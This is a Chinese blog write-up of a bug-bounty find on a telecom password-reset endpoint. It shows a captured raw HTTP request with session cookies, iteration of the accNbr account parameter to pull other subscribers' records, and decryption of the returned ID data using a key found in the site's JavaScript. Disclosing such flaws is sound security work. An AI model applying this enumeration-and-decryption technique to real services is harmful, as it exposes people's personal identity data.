记录一次敏感信息泄露漏洞 id 可遍历 给到高危

已于 2024-05-30 16:49:54 修改
阅读量337 收藏 2
点赞数 2
分类专栏: web安全 文章标签: 安全 网络安全 web安全
于 2024-05-10 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63279914/article/details/138474211
版权

敏感信息泄露 可遍历

在这里插入图片描述

1、点击额重置密码

需要 校园电信手机号

个人手机账号:193xxxxxx02 获取验证码 发现验证码登陆点击登陆

在这里插入图片描述

burpsuit抓包,抓到查询接口

接口

POST /wap_heb/public/resetPwdDeal.jsp?wBqy93ym=uzeSMGlqEDAMFv4Yrd7e2RD5DzehOihK44EZAuBz02NRhUfmGik2Eh.ksL6M HTTP/1.1
Host: x_heb.189.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 48
Connection: close
Cookie: route=8f6d1541b90bd9713d0ace; JSESSIONID=5EA12DAF530BE0B842490; 9mpg8NnStfi5S=5w5ZBzili0UbMfIoSiTVKD_9xuHOdNZ3fiIckp4fjsimbKNrNa9ztanDG2MsGVpmoUnrEYScIa2r85NNxuo3_Iq; insert_cookie=56365047; 9mpg8NnStfi5T=eFjX7GxxsXPCugriDKlYL_cpTAL4Xg.2imVssfBake1f00tQ95NRSYiWJSN1T6_N1GPWkdRI4wf8NdZeojoBMRsbWqxk7SmcYJcJTD1ewzHYwG8XaYr9iqXYHs4_OByQkHDQji7iIUdHa3qfVptQA4MgeRUflggc4J9GPtt4Mn3iyxw8OOs_pPgK.8PGhaHOotLmyUrXXPbDabCMqmcHoh_VXZ2DoHK3_.lGUUaTR2O4HfwIJaB8JZGrLBxC5Bygs2im0bcEQg_oPCP9QQoIgs6bmqOHgJ1t6CmD5USH2roMOLMlbDstIr.37Fwb_xZW4XxmIprEcyEQ

accNbr=xxxxxxxx3635&action=qryOwnerAndUserInfo

accnbr 可以遍历

修改 accnbr的值 得到返回结果

在这里插入图片描述

遍历后五位 从 xxxxxxx36525 到 xxxxxx37000

在这里插入图片描述

返回结果是加密字符串

在js代码中搜索返回字段名

在这里插入图片描述

发现解密密钥和方法

strDecode(json.certNumber,"xxxxxxxR7K!lLhOq","xxxxxxx8","xxxxxxxxnst")

找页面的js代码 ,看是否有解密的代码

在这里插入图片描述

找到解密js代码 复制到 vscode中 调用strDecode方法解密

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

零星_AagT
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(35.2)【接口漏洞专题】接口遍、接口调用重放、接口参数篡改、接口未授权访问
04-15 3148
【专题】接口漏洞利用
信息泄露漏洞
jelly
07-27 6640
前言:信息泄露包括的内容很广泛,很多漏洞都可以归为信息泄露类的漏洞,所以这类漏洞需要去细细消化其中的每个技术. 本篇笔记主要参考burp学院的信息泄露相关内容 什么是信息泄露 是指网站无意间向用户泄露敏感信息。根据上下文,网站可能会将各种信息泄漏给潜在的攻击者,包括: 有关其他用户的数据,例如用户名或财务信息 敏感的商业或商业数据 有关网站及其基础架构的技术细节 泄露敏感的用户或业务数据的危险相当明显,但泄露技术信息有时可能同样严重。尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他
常见中高危漏洞修复建议(汇总)
weixin_59047731的博客
04-16 1060
【代码】常见中高危漏洞修复建议(汇总)
SRC高危漏洞实战——破解加密流程发现的大量信息泄漏
ooooooih的博客
04-26 1235
​ 上篇文章[SRC漏洞挖掘——常见数据加密传输方式解析]分析了一下目前常见的WEB端传输加解密流程,下面分享一个我之前实战的一个某SRC高危例子,就是通过分析加密方式篡改了请求包,进而拿到了大量用户敏感数据。
奇安信安全扫描漏洞解决路径遍和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
一次遍删除倒数第n个节点
08-08
一次遍单链表删除倒数第n个节点的问题,跟删除某个节点的前一个节点是一个思路
信息安全技术:目录遍漏洞利用.pptx
11-01
信息安全领域,目录遍漏洞是一种常见的安全问题,它涉及到Web应用和Web服务器的安全性。攻击者利用这种漏洞可以访问到本不应公开的系统文件,甚至可能控制服务器执行恶意命令。下面将详细探讨目录遍漏洞的原理...
信息安全技术:目录遍漏洞防御.pptx
11-01
目录遍漏洞是网络安全领域的一个重要问题,它允许攻击者通过构造特定的URL,绕过正常的访问控制,访问到服务器上的非预期目录,甚至包括敏感文件。这种漏洞通常发生在Web应用程序中,当系统未能正确验证和处理用户...
jquery将信息到界面上实例代码
10-15
在本篇文章里小编给大家整理了关于jquery如何将信息到界面上的实例代码内容,需要的朋友们可以参考下。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1143
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1270
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 725
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1189
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全。
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 814
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 525
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
网络安全威胁情报到底是什么
学-> 思->用
07-10 408
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 470
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
如何记录到每一列的第一个白色像素
06-03
如果你想要记录到每一列的第一个白色像素的位置,可以参考以下代码: ```matlab % 读取二值图像 bw_img = imread('binary_image.png'); % 获取图像的宽度和高度 [height, width] = size(bw_img); % 初始化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值